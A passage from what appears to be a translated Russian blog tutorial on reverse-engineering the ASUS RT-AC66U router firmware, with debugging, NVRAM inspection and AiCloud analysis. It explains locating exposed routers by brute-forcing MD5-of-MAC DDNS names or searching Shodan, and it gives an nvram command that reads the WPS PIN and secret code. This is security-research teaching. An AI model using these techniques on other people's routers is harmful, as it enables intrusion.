href=\"https:\/\/twitter.com\/rootHak42\">Jacob Holcomb<\/a>.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a23\/8cd\/cb9\/a238cdcb97dce13817ad5bd6044225f4.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/a23\/8cd\/cb9\/a238cdcb97dce13817ad5bd6044225f4.png\" height=\"140\" width=\"400\"\/><\/a><\/p>\n<p>  \u0411\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0438 \u0434\u043b\u044f MIPS Little Endian.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/028\/b64\/d60\/028b64d609af70396314f3151e75ecea.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/028\/b64\/d60\/028b64d609af70396314f3151e75ecea.png\" height=\"232\" width=\"400\"\/><\/a><\/p>\n<p>  \u0422\u0430\u043a\u0436\u0435, \u0432\u0430\u0436\u043d\u043e \u0440\u0430\u0437\u0443\u0437\u043d\u0430\u0442\u044c \u043f\u043e\u0431\u043e\u043b\u044c\u0448\u0435 \u043e \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u0412 OpenWRT Wiki \u0435\u0441\u0442\u044c \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f <a href=\"http:\/\/wiki.openwrt.org\/doc\/techref\/flash.layout\">\u043f\u0440\u043e \u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 \u0444\u043b\u0435\u0448-\u043f\u0430\u043c\u044f\u0442\u0438<\/a>. <a href=\"https:\/\/en.wikipedia.org\/wiki\/Memory_Technology_Device\">MTD<\/a> \u0432 Linux \u0434\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u043b\u0435\u0448-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 \u043d\u0438\u0445. \u041c\u043e\u0436\u043d\u043e \u0437\u0430\u0439\u0442\u0438 \u043f\u043e ssh \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/2bf\/697\/9cd\/2bf6979cdfefb64c5fbe0afee918c6d7.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/2bf\/697\/9cd\/2bf6979cdfefb64c5fbe0afee918c6d7.png\" height=\"212\" width=\"400\"\/><\/a><\/p>\n<p>  \u0420\u0430\u0437\u0434\u0435\u043b NVRAM \u043e\u0447\u0435\u043d\u044c \u0446\u0435\u043d\u0435\u043d \u0434\u043b\u044f \u043d\u0430\u0441, \u0432 \u043d\u0435\u043c \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u0432\u0441\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. \u0412\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0435\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0441\u0434\u0430\u043c\u043f\u0438\u0432 \u043d\u0443\u0436\u043d\u044b \u0440\u0430\u0437\u0434\u0435\u043b (mtd1) \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <b>nvram show<\/b>:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/aa8\/dfb\/384\/aa8dfb38482c8a2148e6b2c04c502f26.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/aa8\/dfb\/384\/aa8dfb38482c8a2148e6b2c04c502f26.png\" height=\"85\" width=\"400\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e84\/7ab\/b58\/e847abb58b49a8f897cdb2e5ad320018.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e84\/7ab\/b58\/e847abb58b49a8f897cdb2e5ad320018.png\" height=\"156\" width=\"400\"\/><\/a><\/p>\n<p>  Pmon \u2014 \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0440\u0430\u0437\u0434\u0435\u043b. \u041e\u043d \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0434\u0430\u043d\u043d\u044b\u0435, \u0441\u0436\u0430\u0442\u044b\u0435 LZMA, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0434\u043b\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u043f\u0440\u0438 \u043d\u0435\u0443\u0434\u0430\u0447\u043d\u043e\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7bb\/e22\/cbf\/7bbe22cbf137d2d4ab9ac623e830b3bb.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7bb\/e22\/cbf\/7bbe22cbf137d2d4ab9ac623e830b3bb.png\" height=\"273\" width=\"400\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/ddc\/51f\/391\/ddc51f391d10eeeea9cc94c9d8c26d37.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/ddc\/51f\/391\/ddc51f391d10eeeea9cc94c9d8c26d37.png\" height=\"333\" width=\"400\"\/><\/a><\/p>\n<h5>\u0412\u0437\u043b\u043e\u043c<\/h5>\n<p>  \u0412\u0440\u0435\u043c\u044f \u043d\u0430\u0447\u0430\u0442\u044c \u0447\u0435\u0433\u043e-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u0442\u044c. \u041d\u0430\u043c \u043d\u0443\u0436\u043d\u044b \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0432\u0440\u043e\u0434\u0435 gdb, gdbserver \u0438 strace \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0442\u043b\u0430\u0434\u043a\u0438 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u043e\u0432. \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u0438\u0445 \u043b\u0438\u0431\u043e \u043a\u0440\u043e\u0441\u0441-\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u043b\u0438\u0431\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c Optware\/Entware \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e7e\/59f\/b0c\/e7e59fb0c065b34e7d6cd035a575b955.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e7e\/59f\/b0c\/e7e59fb0c065b34e7d6cd035a575b955.png\" height=\"220\" width=\"400\"\/><\/a><\/p>\n<p>  Wanduck (GPL_RT_AC66U_VER3004266\/asuswrt\/release\/src\/router\/rc\/wanduck.c) \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0434\u043b\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430. \u041e\u043d \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0435\u0442 \u043f\u0441\u0435\u0432\u0434\u043e-HTTP \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430 \u043f\u043e\u0440\u0442\u0443 18017. \u042d\u0442\u043e\u0442 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043a\u0430\u0436\u0434\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0433\u043b\u0430\u0432\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u0438, \u043f\u043e \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435, \u043e\u0442\u0431\u0440\u0430\u0441\u044b\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0430 &quot;.ico&quot;.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7df\/436\/a5f\/7df436a5f56d011beeb1c5fc96ba41e4.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7df\/436\/a5f\/7df436a5f56d011beeb1c5fc96ba41e4.png\" height=\"321\" width=\"400\"\/><\/a><\/p>\n<p>  \u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c\u0441\u044f, \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d \u0442\u0430\u043a \u0434\u0435\u043b\u0430\u0435\u0442 \u2014 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c gdbserver \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e (gdbserver &#8212;multi localhost:12345 &#038;) \u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0438\u043c\u0441\u044f \u043b\u044e\u0431\u044b\u043c \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u043e\u043c \u043d\u0430 \u0432\u0430\u0448\u0435 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435. \u0415\u0441\u043b\u0438 \u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 IDA Pro, \u043e\u0442\u043a\u0440\u043e\u0439\u0442\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u0442\u0438\u043f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0430 \u0432 \u00abmipsrl\u00bb.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/550\/f86\/ef5\/550f86ef58bf0a2bc3ac77371bcb62f6.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/550\/f86\/ef5\/550f86ef58bf0a2bc3ac77371bcb62f6.png\" height=\"95\" width=\"400\"\/><\/a><\/p>\n<p>  \u041d\u0430\u0439\u0434\u0438\u0442\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u044e handle_http_req \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u0442\u043e\u0447\u043a\u0443 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0430 \u043d\u0430 \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0438 dst_url:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e0b\/99d\/6d1\/e0b99d6d1197edbefda922dd0419027f.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/e0b\/99d\/6d1\/e0b99d6d1197edbefda922dd0419027f.png\" height=\"435\" width=\"640\"\/><\/a><\/p>\n<p>  \u0412\u0432\u0435\u0434\u0438\u0442\u0435 host \u0438 port gdbserver&#8217;\u0430 \u0432 \u043c\u0435\u043d\u044e \u00abDebugger \/ Process Options\u00bb \u0438 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u0435\u0441\u044c \u043a \u043d\u0443\u0436\u043d\u043e\u043c\u0443 PID.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/432\/6f5\/2fc\/4326f52fc051811f6db0f4bc4650b574.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/432\/6f5\/2fc\/4326f52fc051811f6db0f4bc4650b574.png\" height=\"144\" width=\"320\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/0ee\/152\/944\/0ee152944d61546a02c7d23865b78020.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/0ee\/152\/944\/0ee152944d61546a02c7d23865b78020.png\" height=\"94\" width=\"320\"\/><\/a><\/p>\n<p>  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 (F9) \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 <a href=\"http:\/\/192.168.1.1\/x.ico\">192.168.1.1\/x.ico<\/a>. \u041e\u0442\u043b\u0430\u0434\u0447\u0438\u043a \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0430 \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0430 \u0438 \u0432\u044b \u0441\u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u044b \u0438 \u043f\u0430\u043c\u044f\u0442\u044c.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/9c9\/aee\/dd3\/9c9aeedd3a31b362fdf3ef28be5554ef.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/9c9\/aee\/dd3\/9c9aeedd3a31b362fdf3ef28be5554ef.png\" height=\"320\" width=\"640\"\/><\/a><\/p>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043d\u0430\u0439\u0442\u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0446\u0435\u043b\u0438 \u0434\u043b\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f, \u043f\u043e\u0438\u0449\u0438\u0442\u0435 \u0438\u0445 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u00abprebuilt\u00bb \u0432\u043d\u0443\u0442\u0440\u0438 \u00abGPL_RT_AC66U_VER3004266\/asuswrt\/release\/src\/router\/\u00bb. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0438:  <\/p>\n<ul>\n<li>\/acsd\/prebuilt\/acsd<\/li>\n<li>\/webdav_client\/prebuilt\/webdav_client<\/li>\n<li>\/asuswebstorage\/prebuilt\/asuswebstorage<\/li>\n<li>\/eapd\/linux\/prebuilt\/eapd<\/li>\n<li>\/nas\/nas\/prebuilt\/nas<\/li>\n<li>\/flash\/prebuilt\/flash<\/li>\n<li>\/et\/prebuilt\/et<\/li>\n<li>\/wps\/prebuilt\/wps_monitor<\/li>\n<li>\/ated\/prebuilt\/ated<\/li>\n<li>\/wlconf\/prebuilt\/wlconf<\/li>\n<\/ul>\n<p>  \u041c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 AiCloud \u043c\u043e\u0436\u0435\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u0431\u043e\u043b\u044c\u0448\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0440\u0430\u0431\u043e\u0442\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. \u0415\u0441\u043b\u0438 \u0432\u044b \u0440\u0430\u0437\u0440\u0435\u0432\u0435\u0440\u0441\u0438\u0442\u0435 APK, \u0438\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u043a\u0441\u0438, \u0432\u044b \u0441\u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0439 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/d58\/bb5\/a68\/d58bb5a6855a127de7636599695599e1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/d58\/bb5\/a68\/d58bb5a6855a127de7636599695599e1.png\" height=\"320\" width=\"192\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/5b0\/be9\/006\/5b0be90062b05e237f68df29f94b2cad.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/5b0\/be9\/006\/5b0be90062b05e237f68df29f94b2cad.png\" height=\"320\" width=\"192\"\/><\/a><\/p>\n<p>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/606\/320\/ca6\/606320ca666bbc802781b3cc9fe79312.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/606\/320\/ca6\/606320ca666bbc802781b3cc9fe79312.png\" height=\"240\" width=\"640\"\/><\/a><\/p>\n<p>  \u0417\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 ddns_hostname? \u0417\u0430\u0434\u0430\u0447\u043a\u0430 \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e =) (\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0447\u0438\u043a \u0442\u0430\u043a \u043d\u0435 \u0441\u0447\u0438\u0442\u0430\u0435\u0442).<\/p>\n<h5>\u041a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f<\/h5>\n<p>  POST-\u0437\u0430\u043f\u0440\u043e\u0441 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0439 Dynamic DNS \u0430\u0434\u0440\u0435\u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u0435\u0440\u0432\u0438\u0441 asuscomm.com. \u0415\u0441\u043b\u0438 \u043c\u044b \u043f\u043e\u0438\u0449\u0435\u043c \u044d\u0442\u0443 \u0441\u0442\u0440\u043e\u043a\u0443 \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0430\u0445 RT-AC66U, \u0442\u043e \u0441 \u043b\u0435\u0433\u043a\u043e\u0441\u0442\u044c\u044e \u043d\u0430\u0439\u0434\u0435\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u044e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u0442 \u0430\u0434\u0440\u0435\u0441 DDNS:<\/p>\n<pre><code>var isMD5DDNSName = function(){ var macAddr = '&lt;% nvram_get(&quot;lan_hwaddr&quot;); %&gt;'.toUpperCase().replace(\/:\/g, &quot;&quot;); return &quot;A&quot;+hexMD5(macAddr).toUpperCase()+&quot;.asuscomm.com&quot;; }<\/code><\/pre>\n<p>  \u041f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0441 <a href=\"https:\/\/wikidevi.com\/wiki\/ASUS_RT-AC66U\">WikiDev<\/a>, RT-AC66U \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 MAC-\u0430\u0434\u0440\u0435\u0441\u0430\u0445:  <\/p>\n<ul>\n<li>08:60:6E (1 E, 1 W, 2011)<\/li>\n<li>10:BF:48 (1 E, 2 W, 2011)<\/li>\n<li>30:85:A9 (3 E, 3 W, 2011)<\/li>\n<li>50:46:5D (1 E, 2 W, 2012)<\/li>\n<\/ul>\n<p>  \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c IP \u0430\u0434\u0440\u0435\u0441 \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0440\u043e\u0443\u0442\u0435\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0433\u043e AiCloud. \u041f\u0440\u043e\u0441\u0442\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0432\u0441\u0435\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 MAC-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u0438 \u043f\u0435\u0440\u0435\u0431\u0435\u0440\u0435\u043c DNS-\u0438\u043c\u0435\u043d\u0430 <a href=\"http:\/\/www.room362.com\/blog\/2014\/01\/29\/hostname-bruteforcing-on-the-cheap\/\">\u0442\u0440\u044e\u043a\u043e\u043c<\/a> <a href=\"https:\/\/twitter.com\/mubix\">mubix&#8217;\u0430<\/a><br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/739\/0db\/108\/7390db1088a764a48043bdee7db663b5.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/739\/0db\/108\/7390db1088a764a48043bdee7db663b5.png\" height=\"262\" width=\"400\"\/><\/a><\/p>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0441\u043b\u0438\u0448\u043a\u043e\u043c \u043b\u0435\u043d\u0438\u0432\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u0438\u0441\u043a\u0430\u0442\u044c \u00abasuscomm.com\u00bb \u043d\u0430 <a href=\"http:\/\/www.shodanhq.com\/\">Shodan<\/a>.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/03c\/208\/94b\/03c20894b9d257778b713d71ccd81e86.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/03c\/208\/94b\/03c20894b9d257778b713d71ccd81e86.png\" height=\"256\" width=\"400\"\/><\/a><\/p>\n<p>  AiCloud \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043f\u043e\u0440\u0442\u0430\u0445 8082 \u0438 443. \u0421\u0430\u043c \u0444\u0430\u043a\u0442, \u0447\u0442\u043e \u043b\u044e\u0431\u043e\u0439 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u043c\u043e\u0436\u0435\u0442 \u0441 \u043b\u0435\u0433\u043a\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0438\u0441, \u0434\u043e\u043b\u0436\u0435\u043d \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0439\u0441\u0442\u0432\u043e, <a href=\"http:\/\/www.securityfocus.com\/archive\/1\/526942\">\u0432\u0435\u0440\u043d\u043e?<\/a><\/p>\n<p>  \u0414\u0440\u0443\u0433\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0440\u0430\u0437\u043c\u0438\u043d\u043a\u043e\u0439 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0430\u0437\u0431\u043e\u0440 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 WPS PIN-\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. \u0412\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0439 PIN \u0438 secret_code, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 nvram show | grep -E secret_code|wps_device_pin&quot;. \u041f\u043e\u0438\u0449\u0438\u0442\u0435 \u044d\u0442\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u043a\u043e\u0434\u0435 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0434\u043b\u044f \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u043a\u0435\u0439\u0433\u0435\u043d\u0430 (\u0438 \u043d\u0435 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0447\u0438\u043f\u0442\u044e\u043d \u0441 <a href=\"http:\/\/pouet.net\">pouet.net<\/a>).<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7df\/42d\/df6\/7df42ddf648147f8312523df95ec89b9.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/7df\/42d\/df6\/7df42ddf648147f8312523df95ec89b9.png\" height=\"153\" 